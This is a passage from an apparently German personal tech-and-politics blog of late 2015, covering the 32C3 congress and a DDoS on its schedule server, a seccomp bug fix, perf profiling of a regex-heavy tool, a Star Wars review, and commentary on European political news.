[l] Oh einen noch: Das Bingo von der Fnord-Show haben wir von github geklaut. Ehre wem Ehre gebührt. Ich hab da nur minimal mit unegalen Fingern dran herumgepolkt (und damit wahrscheinlich die Dinge schlimmer gemacht). Dieser neumodische Webkram ist halt nicht so mein Ding :)
Während des Congresses hatte ich den Github-Link aus dramaturgischen Gründen auskommentiert, und dann beim Online-Stellen vergessen wieder rein zu machen. Jetzt ist er wieder drin.
[l] Wer meinen "Check your privileges"-Vortrag auf dem 32c3 gesehen hat: Dort beschrieb ich, wie ich versucht habe, mehr als einen Seccomp-Filter einzutragen, und damit dann nicht das gewünschte Verhalten bekam.
Dank der freundlichen Hilfe von Jann Horn hat sich das jetzt als Fehler in meinem Seccomp-Programmen herausgestellt. Ich hatte schlicht vergessen, in der 2. und 3. Bytecodeliste das Syscall-Argument zu laden. Ich ziehe also damit die Vermutung zurück, dass da im Kernel noch was nicht sauber ist, das war alles meine Schuld.
Wer mal gucken will, kann sich den (jetzt funktionierenden) Code in ping.c von mininet mal anschauen.
Ich ärgere mich jetzt natürlich, dass ich so einen Anfängerfehler gemacht habe. Auf der anderen Seite ist das natürlich auch ein Indiz dafür, dass das API vielleicht doch besser wie pledge von OpenBSD aussehen sollte, da kann man einfach weniger falsch machen.

Wed Dec 30 2015

[l] Ich weiß nicht, ob das noch jemandem so ging, aber ich war dieses Jahr fast versucht, nicht zum Congress zu gehen. Liegt vielleicht auch daran, dass ich aus der Ferne ein bisschen von dem Stress im CCC mitgekriegt habe. Normalerweise gibt es da Monate der Vorbereitung, aber dieses Jahr gab es auch ein Camp, und daher war für den Congress viel weniger Vorbereitungszeit da, und die Leute waren alle noch völlig ausgepowert von der langen Campvorbereitung. Ich hatte ein paar Mal den Eindruck, der Congress könne eh nichts werden, viel zu viel Leute, die echt auf dem Zahnfleisch gingen, und sich nur mit Mühe aufrechte vor dem Bildschirm halten konnten.
Ich bin sehr froh, dass ich mich an der Stelle überwunden habe, denn das war der schönste Congress, an den ich mich überhaupt erinnern kann. So wunderschön entspannt war das schon lange nicht mehr.
Vielleicht weil keiner mehr Kraft hatte, um sich sinnlos über Kleinigkeiten aufzuregen :-)
Gut, natürlich ging hie und da mal was nicht, und die Teilnehmerzahl ist inzwischen so unfassbar groß, dass ich gefühlt tagelang auf der Suche nach bestimmten Leuten herumgeirrt bin. Am Ende bereue ich sogar, nicht noch mehr Zeit in schönen Gesprächen verbracht zu haben. An alle alten und neuen Freunde, mit denen ich dieses Jahr zu nichts gekommen bin: Tut mir leid, holen wir nach!
An den Rest des Publikums: Danke, dass ihr alle so cool wart. Selten wird so klar wie auf dem Congress, dass miteinander reden die Lösung für fast alle Probleme auf der Welt ist. Sollten wir alle noch viel mehr tun.
Übrigens, falls sich jemand wundert, wieso events.ccc.de so viel schlechte Laune gemacht hat: Es gab da eine Syn-Flood gegen die Kiste, von außerhalb des Congressnetzes, die damit die 1 GBit-Leitung des Servers saturiert hat. Der Server selbst war eine vergleichsweise dicke Hardware mit 12 Cores und 64 GB RAM, die sich da die Klöten geschaukelt hat von der Auslastung her, aber von außen kam man halt nicht ran. Und der DDoS ging nicht nur gegen die Kiste. Als auf Twitter der erste Mirror auftauchte, war der innerhalb von 10 Minuten auch weggeknüppelt. In der Mitte gab es auch noch eine Guru Meditation, das lag nicht an der Synflood. Da war das Backend runtergefahren. Das war zwar nicht direkt aber indirekt auch Schuld des DDoS. Alles sehr unerfreulich.
So richtig viel kann man da leider nicht machen. Man kann jetzt die IP von dem Server wild rumrotieren, oder man kann das Frontend dicker anbinden, klar, aber am Ende des Tages: Wenn dich jemand ärgern will, und er muss es nur vier Tage durchhalten, dann kann er das tun.
Ich denke, nächstes Mal laden wir halt die Fahrplandaten als JSON-Dump oder so bei github hoch. Mal schauen.

Tue Dec 29 2015

[l] So, der Fnord-Jahresrückblick ist vorbei, und ich bin sehr zufrieden. Frank und ich hatten den Fahrplan wohl falsch gelesen und dachten, es geht um Punkt Mitternacht los. Es ging um 0:15 los. Frank hatte 90 Minuten als Limit eingestellt, aber abgehend von 0:00. Wir hätten am Ende also noch 15 Minuten Zeit gehabt eigentlich. Aber hey, war nicht so schlimm gehetzt. Die Folien waren ja eh eher als Gesamtcollage gemeint, nicht für sich alleine jeweils. Wir wollten extra nicht, dass die Leute alle das Kleingedruckte zu lesen versuchen. Das lief glaube ich ganz gut.
Bei dem Bingo hatte ich irgendwie gehofft, dass man das hören kann, wenn jemand Bingo hat und der Browser den Sound spielt, aber in so einem großen Saal mit so viel Luft hat so ein Smartphone-Lautsprecher offensichtlich nicht genug Druck. So riefen die Leute alle Bingo, war auch schön.
Am Ende hatte dann noch jemand einen coolen fernsteuerbaren Hai dabei und ließ ihn fliegen, das sah man auf dem Stream wohl leider nicht mehr. Der wurde dann von der barbarischen Belüftungsanlage des Hauses in einen Strudel des Verderbens gezogen und hängt jetzt irgendwo in den Eingeweiden eines Ansaugstutzens der Belüftungsanlage.
An dieser Stelle nochmal vielen Dank an die Haustechnik, die da auf Zuruf ihre Überstunden nochmal verlängert für uns. Vielen Dank auch, dass keiner irgendwelche Überraschungsaktionen gemacht hat, dann wäre bei uns aus Zeitmangel echt Stress ausgebrochen.
Ich hoffe, ihr hattet auch alle Spaß, und empfehle ungesehen die Physiker, deren Veranstaltung parallel zum Fnordrückblick lief. Deren Vorführung wurde laut einer Herold-Durchsage wegen feuerpolizeilichen Auflagen (!!) in Saal G verlegt und live in Saal 2 gestreamed. Vor meinem geistigen Auge sehe ich da so Mythbusters-Style Explosionen. Die hatten auch echt Zulauf, wir hatten sogar am Anfang noch ein paar freie Sitze im Saal. Hut ab vor den Kollegen, ich werde mir deren Video auf jeden Fall reinziehen.
Das Terror-Bingo findet ihr bei ptrace.fefe.de/fns-bingo/, der nächste Anschlag kommt bestimmt!
Update: Ich sehe gerade auf Fotos, dass jemand ein gelbes "SAFE SPACE - DO NOT CROSS"-Band vorne um unseren Tisch gehängt hat. Wir kamen von hinten rein und von unserer Seite war das nicht zu sehen. Wieso hat mich denn da keiner vor Ort drauf hingewiesen? Gibt es schon Bekennerschreiben? Da hätte ich ja gerne vor Ort auch Gelegenheit zum Mitlachen gehabt! Aber ein schöner Fnord, jetzt denken bestimmt die ganzen Empörten, dass ich das da hingehängt habe :)
Update: Das groß-ar-tige Cyber-Cyber-Video der Jung&Naiv-Ultras ist online! An dieser Stelle nochmal vielen Dank, das hat mir echt den ganzen Tag schon gute Laune gemacht heute.

Mon Dec 28 2015

[l] Komme gerade aus der CCC-Jahresrückschau, die natürlich Pflichtprogramm ist.
Den Tag heute habe ich mir größtenteils für Socializing freigenommen, vielleicht ein-zwei Interviews dazwischen. Mal schauen, was kommt.
Von den Vorträgen werde ich mir aber auf jeden Fall "The Pearl Jam 2" angucken um 20:30. Das ist der selbe Typ, der letztes Jahr schon diesen Perl-Vortrag gemacht hat, der mich so begeistert hat. Die Perl-Community hat damals entrüstet reagiert, dass jemand Probleme in bei perl mitgelieferten Modulen als Perl-Probleme zu bezeichnen wagen könnte. Also ist die Vortragsankündigung dieses Jahr: Na gut, dann halt Core Perl! Ich habe Popcorn zurückgelegt.
Danach werde ich wahrscheinlich bis zur Fnord-Show in Saal 1 bleiben, die Vorträge dort sind alle sehr einladend. Möglicherweise laufe ich für den 23:00-Slot in Saal 2, das klingt auch sehr interessant.
Ansonsten wurde mir inzwischen gesagt, dass ich 30 Minuten überziehen darf mit dem Fnord-Rückblick, aber danach … *faustreck* — und da kamen dann so Sachen von "dann macht das Haus das Licht aus" bis "dann trägt die Security dich raus". 90 Minuten klingt realistisch. Hoffentlich haben da nicht irgendwelche Leute irgendwelche Überraschungen geplant, die den Zeitplan beeinträchtigen.

Sun Dec 27 2015

[l] Israel plant ein Gesetz gegen regierungskritische NGOs, insbesondere gegen aus dem Ausland finanzierte. Erstmal geht es nur um eine Kennzeichnungspflicht bei Publikationen, Schriftwechsel mit Abgeordneten und Gesprächen mit Beamten, und die Strafe (7500 Dollar) scheint auch noch eher moderat. Also moderat ist vielleicht das falsche Wort. Aber sagen wir mal so, ein Soros-U-Boot könnte sich das ein paar Mal leisten.
Außerdem geht es wohl erstmal nur um Organisationen, die von ausländischen Regierungen finanziert werden, also nicht um Soros, eher um RT oder Al Jazeera? Leider stehen da keine konkreten Beispiele, wen sie rausekeln wollen. So richtig furchtbar schlimm klingt das aber ehrlich gesagt noch nicht, finde ich. Im Gegenteil würde ich mir sowas generell wünschen, für alle Organisationen, nicht bloß wenn die Finanzierung aus dem Ausland kommt.
In den USA gibt es ja diese lustige Forderung, man möge Politiker wie NASCAR-Fahrer behandeln. Die Fahrer haben alle Logos ihrer Sponsoren auf der Jacke.
In dem Artikel werden mehrere Russland-Vergleiche gezogen, und wenn man sich das Anti-NGO-Gesetz in Russland anschaut, dann ist das in der Tat auch erstmal nur ein Transparenzgesetz. Nur haben die Russen auch "zusätzliche Audits" im Programm. Da weiß ich jetzt nicht, wie die konkrete Intensität aussieht. Auf der anderen Seite scheinen die Schwellwerte bei den Russen sehr gering zu sein, da reichen schon 3% des Budgets aus ausländischen Quellen.
Jetzt würde ich ja wirklich mal gerne wissen, wieso die ganzen NGOs in Russland lieber zugemacht haben. Das muss ja noch mehr fiese Auswirkungen haben als dass der Staat Einblick in die Buchhaltung haben will. Besonders lustig finde ich gerade, dass ausgerechnet Transparency International einer der auf Wikipedia namentlich genannten Gegner des Transparenzgesetzes ist.

Tue Dec 22 2015

[l] Zu der Italien-Nummer kommt hier noch ein weiterhelfender Kommentar rein:
zu dem Verfahren was die Italiener gerade mit ihren Olivenbäumen machen gibt es auch schon bei uns ein ähnliches Vorgehen.
In Bayern, speziell südöstlich von München, wird seit 2004 versucht, den Anoplophora glabripennis (Asiatischer Laubholzbockkäfer) zu bekämpfen.
Da ist auch die einzige Möglichkeit, um den Befallsfund eine kreisrunde, 2500m Quarantänezone einzurichten, alle potenziellen Wirtspflanzen (immerhin bis zu 35m hohe Bäume, Pappel, Ahorn, etc.) zu fällen, vor Ort zu häckseln und zu verbrennen.
Vor allem muss ein aufwendiges Monotoring durchgeführt werden. Das wird vom Boden, per Spürhund und mit Baumkletterern gemacht.
Es ist also gar nicht so einfach, etwas gegen solch ein Neozoon zu machen. Für das Vorgehen gibt es btw EU-Verordnungen.
Hier noch ein paar Links:
http://www.lfl.bayern.de/ALB
http://www.lfl.bayern.de/ips/pflanzengesundheit/097517/index.php
https://de.wikipedia.org/wiki/Asiatischer_Laubholzbockk%C3%A4fer
http://pflanzengesundheit.jki.bund.de/dokumente/upload/6a539_be2015-893a-glabripennis-de.pdf
(Danke, Henrik)
[l] Nach kurzem Anlesen einiger E-Mail-Diskussionsbeiträge fällt auf, dass niemand die "Netz-X" verteidigen will. Ich hatte erwartet, dass das geschehen würde. Keiner tut das.
Stattdessen gehen bisher alle Einsendungen (bin erst bei 20%) in die Gegenrichtung, dass auch die Offline-Antifa/Feministen solche toxischen Muster haben.
Das überrascht mich jetzt etwas, ehrlich gesagt.
Einen Beitrag will ich mal zitieren, weil er besonders weit außerhalb meines Erfahrungsbereiches liegt, und von je weiter weg ein möglicher Erkenntnisgewinn kommt, desto wichtiger sollte man ihn nehmen.
bezüglich Antifa IRL kann ich sagen, dass ich die von dir gemachten Erfahrungen in der Vergangenheit auch ohne Twitter gemacht habe (es zu dem Zeitpunkt gar kein Twitter gab). Ich bin Mitglied einer Studentenverbindung, genauer gesagt einem Corps. Corps sind unpolitische Verbindungen, d.h. ein Vorwurf, dass da Nazis unterwegs seien, ist ziemlich hanebüchen (auch wenn Frank auf einem Congress vor ein paar Jahren das Gegenteil behauptet hat, da aber mal eben Corpsmitglieder einer Burschenschaft gleichen Namens zugeordnet hat). Nichts desto trotz wurden in Heidelberg schon mal Corpshäuser von der Antifa angezündet und einer unserer Mitglieder (zu dem Zeitpunkt weit über 60 Jahre alt) wurde von einer Antifagruppe in einer Seitengasse krankenhausreif geschlagen. Ich selbst wurde auch schon mal mit Eiswürfelbeuteln beworfen (bzw. die Gruppe, in der ich mich zu dem Zeitpunkt befand), da sich die Werfer aber nicht zeigen wollten, ging das ganze ungezielt über eine Mauer von einer Parallelstraße, so dass das glücklicher- weise daneben ging.
Ich habe versucht, im Netz einen Bericht über obige Brandstiftung zu finden und habe es zwar nicht gefunden, dafür aber https://iftuz.wordpress.com/category/art-des-vorfalls/versuchte-brandstiftung/ wo jemand solche Vorfälle zu sammeln scheint. Das ist aber bei weitem nicht vollständig. Wenn man München auswählt fehlt z.B. der Molotow-Cocktail, der in den Garten von unserem Haus geworfen wurde (als gerade Familien mit Kindern dort anwesend waren). Einzig die Dämlichkeit desjenigen (er verwendete eine Sektflasche - das wohl stabilste Stück Glas auf dem Markt - und füllte sie mit Diesel weil das wohl billiger war) verhinderte, dass es zu Schlimmerem kam.
Zu meinen Fachschaftszeiten an der Uni hatte ich auch diverse Diskussionen mit den Antifas des AStA und die liefen ähnlich wie das, was du beschrieben hast, was du als Netzantifa bezeichnest, von daher würde ich deiner Theorie eher widersprechen. Ein Großteil der Gegendemonstranten bei Naziaufmärschen dürften auch nicht Leute von der Antifa sein, sondern eher Leute aus der Gegend, die deutlich machen wollen, dass es sich nicht um die allgemeine Meinung dieser Gegend handelt, wenn da die Nazihanseln in der Straße rumwuseln.
Außerdem gab es Kritik an meiner Äußerung, Netz-X bekämpfe ja nichts wirklich. Einerseits aus der Richtung, dass es Defense Funds für Leute wie Gregory Alan Elliott gibt, andererseits mit Beispielen dafür, wie Leuten das Leben zerstört wurde, beispielsweise Justine Sacco.

Mon Dec 21 2015

[l] Buchempfehlung: Die Expanse Serie von James S A Corey, mindestens jedenfalls Buch 1 davon, Leviathan Wakes (die anderen habe ich noch nicht).
Ich bin darauf gekommen, weil Syfy (US-TV-Kanal) eine Serie daraus gemacht hat. Die machen viele Serien, aber die meisten sind eher schwach, auch von den Production Values her. Diese Serie wird aber aggressiv beworben, unter anderem auch damit, dass es eben eine Verfilmung dieser Buchserie ist. Da dachte ich mir, ich geben den Büchern mal eine Chance und habe mir das erste geholt.
Das war gestern. Ich las, bis ich nachts um drei vor Übermüdung umfiel. Das ist mir zuletzt bei The Martian so gegangen.
Ich weiß nicht, ob die deutsche Übersetzung was taugt, ich habe mir die englische Version geholt. Und die ist exzellent und unbedingt empfehlenswert. Aber wie beim Martian würde ich empfehlen, das jetzt schnell vor den Weihnachtsfeiertagen zu holen, damit ihr das in Ruhe am Stück durchlesen könnt, denn das werdet ihr wahrscheinlich tun, sobald ihr ein paar Seiten angelesen habt :-)
Der Plot ist Scifi, aber nicht "Star Trek" Scifi, sondern eher so "near future" Scifi. Die haben Raumschiffe, aber keine Lichtgeschwindigkeit, keinen Hyperraum, keinen Subraum, keine Laserkanonen, keine Stargates, keine Teleportation. Die Erde ist massiv überbevölkert, und die Menschheit hat daher den Mars kolonisiert und bezieht Mineralien aus dem Asteroidengürtel und Eis vom Saturn. Ein Teil der Geschichte spielt auf einer Logistik-Station auf Ceres (einem Zwergplaneten im Asteroidengürtel). Aliens sind noch keine gesichtet worden. Zwischen Erde und Mars gibt es vereinzelt Spannungen, man könnte fast von sowas wie einem kalten Krieg sprechen. Der Asteroidengürtel sitzt in dem politischen Klima ein bisschen zwischen den Stühlen.
Das Buch handelt grob von Politik, Idealismus, Wissenschaft, Ethik, Altem (Stabilität, Wirtschaft) gegen Neues (Revolution, Entdeckung).
Von der TV-Serie gibt es erst vier Episoden, und die sind schon richtig gut. Nicht nur für Syfy-Verhältnisse sondern auch auf der Weltbühne. So gut, dass ich mir das Buch geholt habe, um rauszufinden, wie es weitergeht. :-)

Sat Dec 19 2015

[l] PSA: Der neue Star Wars-Streifen ist ein typischer JJ-Abrams-Plastikfilm. Milde Spoiler folgen.
Den guckt man sich an, wenn man Harrison Ford nochmal erleben will, ansonsten kann man sich das auch sparen.
Dieser JJ Abrams kommt mir immer vor, als würde er in einer fremden Sprache ein Buch zu schreiben versuchen. Bei dem kommen die richtigen Wörter vor, aber die Grammatik stimmt nicht. Der fängt nicht mit einer coolen Story an, sondern copy&pasted aus den anderen Star Wars-Filmen und aus dem Zeitgeist Szenen zusammen.
Wir brauchen einen Raumgleiter. Eine Verfolgungsjagd. Den Millenium Falcon. Einen imperialen Sternzerstörer. Ach wisst ihr was? Wir machen eine Verfolgungsjagd mit dem Millenium Falcon durch einen imperialen Sternzerstörer!
Wir brauchen eine Superwaffe! Sowas wie den Todesstern! Wie, hatten wir schon zweimal? Na dann machen wir das diesmal NOCH GRÖSSER!!1!
Und wir brauchen einen jungen Jedi, der von der dunklen Seite verführt wurde und jetzt für die Bösen arbeitet! Wir brauchen eine Vaterfigur, die ihn zu retten versucht aber dabei scheitert! Wir brauchen einen Wookie! Hey, warum schicken wir nicht die Vaterfigur mit dem Wookie hinter dem gefallenen Jedi her? Am besten über einen tiefen Abgrund! Wie, hatten wir schon? Mehrfach? Na gut, dann machen wir das dieses Mal eine andere Art von Abgrund! Und wir machen eine völlig sinnlose riesenlange Brücke über den Abgrund!
Oh und wir brauchen Lichtschwerter! Wie, hatten wir schon? OK, dann machen wir diesmal die CGI-Effekte subtil anders. Wir tun noch eine Parierstange dran!1!! Wie, die würde von einem anderen Lichtschwert sofort abgeschlagen? Egal, ist cooler so!!1!
Wir brauchen einen jungen Naiv-Nachwuchs als Jedi! Wir brauchen starke Frauenfiguren! Oh, lasst uns eine Frau für die Rolle des Naiv-Jedi-Nachwuchses nehmen! Und um alle zu verwirren, spricht sie mit britischem Akzent, wie sonst nur die Imperialen in den Vorgängerfilmen! Oh und dem abtrünnigen Stormtrooper geben wir einen amerikanischen Akzent!
Oh und wir brauchen einen Wüstenplaneten! Und einen Waldmond, auf dem der Schild deaktiviert wird!
Plotlöcher der Größe Arizonas werden durch Explosionen und schon fast als penetrant auffallenden Fanservice übertüncht. So muss Harrison Ford vor riesigen kugelförmigen Monstern fliehen, die an die Falle aus Indiana Jones erinnern, Han Solo sagt "I have a bad feeling about this", es gibt einen Trash Compactor, fehlt nur noch ein Kühlschrank, der eine Nuklearexplosion überlebt.
An dem Film ist nicht alles schlecht. Er ist nicht so furchtbar wie seine drei Vorgänger. Und wer sich mal die alten Filme nochmal frisch anguckt: Die waren auch echt Scheiße. Wir haben es damals nicht gemerkt, weil wir Kinder waren. Die damals Erwachsenen fanden die damals auch schon Scheiße. Ich hab damals auch Dune geguckt, die Verfilmung mit Sting, und fand die supergeil. Zwanzig Jahre später habe ich den Film nicht bis zu Ende gucken können, so schlecht war der gemacht. Als Kind ist man halt unkritischer. Deshalb fängt man ja auch bei Kindern mit der Religions-Indoktrination an. Aber ich schweife ab.
Dieser neue Film ist zwar in jeder Hinsicht schlecht, aber die anderen Filme in der Saga sind noch schlechter. Und er wird sicher Milliarden einspielen. Alleine schon das unerträgliche Merchandising. Daher bin ich mir sicher, dass wir uns einer endlosen Sturmflut von Disney-Plastikfilmen zubewegen, wahrscheinlich auch bald schön mit Crossover-Filmen zwischen Marvel, Star Trek und Star Wars.
Und was mich ja immer am meisten zwickt bei solchen Filmen: Bei all den hunderten von Millionen Dollar Budget, da hatten sie keine 100 Dollar übrig, um das Skript ein paar Nerds zu zeigen, die ihnen dann sagen, welche Stellen zu übel sind und die Fähigkeit zum Ignorieren von Widersprüchen und theoretisch unmöglichen Dingen überfordern werden.
Ich glaube ja, dass der Abrams am Ende des Tages gar kein so schlechter Regisseur ist. Aber man darf dem halt keine Freiheiten oder gar Mitarbeit am Skript überlassen. Wenn der mitreden darf, wird aus jedem Stoff am Ende bloß ein Transformers-Film.
Update: Damit das hier nicht nur negativ ist: Ich habe gestern "The Man From UNCLE" geguckt und fand den prima. Jedenfalls deutlich besser als seine Ratings bei Rottentomatoes und co glauben machen. Es ist kein Snatch, aber ein schöner Popcornfilm.
Update: Hier kamen noch Mails von anderen an, die sich über den Film geärgert haben. Einer der Punkte: Typische Disney-Fixierung auf Jugend ("selbst der Todesstern-Kommandant"). Stimmt. Geht mir auch auf den Sack, wenn da lauter 16jährige rumfuhrwerken. Aber den Todesstern-Kommandanten würde ich da explizit ausnehmen wollen, weil er der einzige ernstzunehmende Schauspieler weit und breit war. Der einzige, der seiner Figur ein bisschen Gravitas geben konnte, ein bisschen einen inneren Konflikt dargestellt hat. Der nicht wirkte, als spiele er sich selbst oder das sei alles eine Comedy-Veranstaltung. Diesem verkappten Soap-Darsteller und seinem Ersatz-Darth Vader habe ich seine Gefühle keine Sekunde abgenommen. Ich kannte den noch nicht, in den USA kennt man den wohl von seinem Schaffen in der HBO-Serie "Girls". Ich war nicht beeindruckt.
Ein weiterer Kritikpunkt per Mail war, dass es da eine Szene gibt, wo einem ein Sternenzerstörer in Extrem-3d entgegen kommt, und überhaupt einen Haufen unnötige 3d-Szenen. Ich halte das ja für vertragliche Verpflichtungen. Die Kinos wollen 3d, weil sie dann einen Aufschlag auf den Eintrittspreis nehmen können. Und die Anbieter der 3d-Effekt-Reinrechnen-Technik geben den Studios dann die Lizenz nur, wenn die dann lauter turbokrasse 3d-Shots einbauen, damit sich das auch lohnt. Dieser Sternenzerstörer-Shot war in der Tat lächerlich, aber mir persönlich nicht so wichtig.
Auch nur über vertragliche Verpflichtungen kann ich mir erklären, wieso sie den Soap-Sith dauernd die Maske abnehmen ließen. Der hatte die Maske häufiger ab als auf. Was für ein Bullshit. Wieso trägt er sie dann überhaupt?
Sagt nichts. Weil Darth Vader eine hatte. Das ist alles.
Oh und eine Sache hat mich noch geärgert an dem Film. Die weibliche Hauptrolle. Die Schauspielerin konnte das und war gut, die Rolle war auch (im Vergleich zu den anderen) vergleichsweise gut geschrieben. Aber weil die ganzen anderen Aspekte in dem Film alle so zusammenkopiert und fokusgruppenoptimiert rüberkamen, ärgerte ich mich darüber, dass ich denen jetzt nicht mehr glauben konnte, dass sie das aus noblen Gründen so gemacht haben. Das wirkt auf mich einfach nicht so, als sei das heute halt normal, dass wir weibliche Helden haben (ansonsten ist das nämlich gähnende Leere in dem Film; es gibt da noch Leia, inzwischen Generälin, mit gefühlt einer Minute Screen Time über den Film verteilt, und eine Stormtrooper-Kommandantin, deren Gesicht man die ganze Zeit nicht sieht, weil sie einen Helm aufhat, und die auch nicht viel häufiger als Leia zu sehen ist). Die Heldin ist weiblich, weil man den Twitter-Scheißewerfern vorgreifen wollte. Damit ist das als Geste für mich entwertet. Und die Geste hätten wir echt mal brauchen können. Vor allem auch, weil die Rolle erfreulich wenig sexualisiert war (verglichen mit, sagen wir, Wonderwoman aus dem Trailer von Batman vs Superman). Einfach nur eine Frau, die ordentlich Arsch trat. Hätte so schön sein können.

Fri Dec 18 2015

[l] Dänemark will jetzt den Flüchtlingen ihren Schmuck wegnehmen.
Justice and Immigration Minister Sören Pind had last week defended the move during a live news program on a state-run TV channel saying, "This way the revenue that is obtained can be used to meet the costs of the refugees."
Ich weiß gar nicht, was die alle haben. Die Taktik hat Tradition, das haben wir Deutschen auch schon gemacht. Gut, damals ging es um die Kosten für die Ausreise, nicht für die Einreise und Aufbewahrung. Aber es ging auch um eine Bevölkerungsgruppe aus dem Nahen Osten. Und man kann sagen, was man will, effektiv und nachhaltig waren unsere Methoden damals!1!!

Thu Dec 3 2015

[l] Ich spiele gerade ein bisschen mit perf herum. Das ist ein Performance-Mess-Tool, das dem Linux-Kernel beiliegt. Damit kann man auf der einen Seite ganz tolle Kernel-Analysen fahren, z.B. sowas wie "wer macht hier eigentlich gerade den Disk I/O", aber man kann damit eben auch recht effizient Profiling von Userspace-Prozessen machen. Profiling ist ja grundsätzlich eine recht schwierige Sache, denn wenn man es zu oberflächlich macht, sind die Ergebnisse wahrscheinlich nutzlos, und wenn man es gründlich macht, dann verfälscht man das Laufzeitverhalten so stark, dass die Ergebnisse wahrscheinlich auch nutzlos sind.
Ich habe daher eine Weile lang gar nicht Profiling mit Profiling-Tools gemacht, sondern mit Coverage-Tools, speziell gcov. Damit kann man sich am Ende zeigen lassen, welche Codezeile wie häufig ausgeführt wurde. Das ist zwar nicht identisch mit der Frage, wo die Zeit verbraucht wurde, aber es hilft trotzdem beim Finden von Hotspots.
perf kann jetzt Sampling-basiertes Profiling machen, mit einstellbarer Samplingrate, und kann einem dann den Code disassemblieren und die heißen Instruktionen zeigen. Ich bin noch nicht sehr weit mit dem Tool, aber mein Eindruck ist, dass das recht viel kann. Mehr jedenfalls als ich gerade benutze :-)
Das Testobjekt für mein Rumspielen war ein Tool, das ich für einen Kunden geschrieben habe. Der nimmt per syslog oder stdin Logdaten entgegen und pseudonymisiert die dann. Der Schlüssel für die Rückzuordnung von Pseudonym und Original wird jede Stunde weggeschmissen und neu gemacht, damit man das auch einfach mitlaufen lassen kann. Ein Teil der Aufgabe des Tools ist, per Regex Usernamen zu erkennen. Dabei ruft das Tool dann regexec auf den String ab dem potentiellen Usernamen auf (und das ist in der Praxis jeder Wortanfang).
Ich erzähle das, weil mir dann auffiel, dass das Tool vergleichsweise viel Zeit im Regex-Matching verbracht hat. Nun muss man über regexec wissen, dass der nicht nur am Anfang des Strings matcht, sondern irgendwo in der Zeile. Aus Performancegründen fängt die Regex für den Usernamen daher mit einem ^ an, d.h. "matche nur am Zeilenanfang". Meine Regex-Implementation ist an der Stelle schön in Schichten aufgeteilt, und der Effekt war, dass regexec natürlich nicht wusste, dass die Regex mit einem ^ beginnt und dann trotzdem für alle weiteren Zeichen im Inputstring zu matchen versucht hat. Diese Matchversuche schlugen natürlich alle fehl, weil es eben nicht der Anfang des Strings war. Aber wie sich rausstellte, verbrachte das Tool in diesen sinnlosen Matches (obwohl die schon jeweils direkt abgebrochen wurden) ca. 3/4 seiner Laufzeit. Ich habe dann eine Ein-Zeilen-Änderung in regexec getan, dass der das Matchen im Rest der Zeile nicht versucht, wenn die Regex mit ^ anfängt, und der Durchsatz des Tools hat sich vervierfacht.
Die Lektion an der Sache ist aber eine Andere. perf zeigte mir vorher an, dass regexec 12% ausmachte. Es zeigte mir das zwar als teuerste Funktion an, aber die Zahlen haben bei weitem nicht die Vermutung gerechtfertigt, dass diese Änderung so viel Einsparen würde. Profiling-Tools sind eben schwierig :-)

Wed Dec 2 2015

[l] Sind Grünen-Wähler anwesend? Leute, vielleicht, die glauben, Renate Künast verträte ihre Interessen? Na dann lest mal das hier durch.
Urheber- und Medienrechtlechter waren sich auf einer Tagung mit der Grünen Renate Künast einig, dass der Anonymität im Internet der Garaus gemacht werden sollte. Auch die Haftungsprivilegien für Provider stehen zur Disposition.
Money Quote:
"Wir können nicht die Anonymität hochhalten, wenn alle den ganzen Tag über im Internet nur noch rüde beschimpft werden", erklärte die Ex-Ministerin den Zuhörern, die vermutlich in ihrer Jugend noch größtenteils gegen die Volkszählung demonstriert hatten.
:-)

Tue Dec 1 2015

[l] Die Berliner Polizei hat einen Phishing-Test gemacht. Über 50% der Beamten sind reingefallen.

Mon Nov 30 2015

[l] Kennt ihr diesen Spruch? "Hätte er geschwiegen, wäre er Philosoph geblieben"? Im Original auf Latein "Si tacuisses, philosphus mansisses"? Der ist ein bisschen fehlzitiert, im Original geht es um einen, der sich mit jemandem anderen streitet, und ihn fragt, ob der jetzt endlich einsieht, dass er ein Philosoph ist. Darauf dann diese Antwort. Die englische Version ist auch sehr schön: Better to remain silent and be thought a fool than to speak and remove all doubt. Der Spruch hat es sogar in die Bibel geschafft (Sprüche 17:28).
Nun, so scheint sich das auch mit dem Gründer des Zentrums für politische Schönheit zu verhalten. Der hat jetzt ein Buch veröffentlicht, ein Manifest, und das lässt wohl recht tief blicken. Es geht da anscheinend nicht um Aufklärung oder gar Marxismus sondern um das Rückrollen der Moderne, eine Art Neo-Klassizismus. Forschung und Wissenschaft haben alles Scheiße gemacht, die Welt ist ohne Werte und nur noch nihilistisch und verlogen.
Jetzt wo ich das hier tippe, erinnert mich das an den ewigen Kampf in Adam-Curtis-Dokumentation, da kämpft auch immer jemand gegen die moralische Korruption der Gesellschaft.
Die Rezension beim ehemaligen Nachrichtenmagazin bläst ins selbe Horn.
Update: Ich habe eine Mail von Philipp gekriegt und er kann die Kritik nicht nachvollziehen. Es geht ihm gar nicht um ein Rückdrehen der Moderne, sagt er. Ich schau mal, ob ich darüber hinaus gehend noch ein Statement kriege, was er denn sonst sagen will :-)

Sun Nov 29 2015

[l] Ausrede des Tages: Warum hat Obama ISIS noch nicht die Ölinfrastruktur kaputtgemacht? Aus Umweltschutzgründen! Nein, wirklich! Das hat Michael Morell in einem Interview so gesagt, und der ist Ex Deputy Director der CIA.

Sat Nov 28 2015

[l] Bei diesem Flugzeugabschuss in Syrien stellt sich ja die Frage, wie man überhaupt legitim von einem Abschuss wegen Grenzübertritts reden kann, wenn die Rakete für den Abschuss länger zu dem Flugzeug unterwegs ist als das Flugzeug die Grenze angeblich verletzt hat. Da wird ja zwangsläufig die Rakete das Flugzeug über Syrien und nicht in flagranti erwischen, und das sieht ja doof aus dann.
Das scheinen sich auch die Türken gedacht zu haben, denn wenn man den Schilderungen der Russen glaubt, dann haben die Türken die Rakete auf die SU-24 abgefeuert, weit bevor die die Grenze übertrat. Wohl damit die Rakete die SU-24 über türkischem Gebiet erwischt oder so. Außerdem mussten die Türken dafür den syrischen Luftraum verletzen.
Immerhin hat Erdogan überraschend um ein Treffen mit Putin gebeten, hoffentlich um sich zu entschuldigen. Die Nato hat zwar vorneherum Bündnistreue beton, aber ich würde mal stark vermuten, dass die dem Erdogan sehr deutlich gemacht haben werden auf diplomatischen Kanälen, dass weder die Amis noch die Europäer gerade groß gewillt sich, sich in einen Krieg mit Russland hineinziehen zu lassen, weil da jemand einen auf dicke Hose machen wollte in der Türkei.

Sat Nov 21 2015

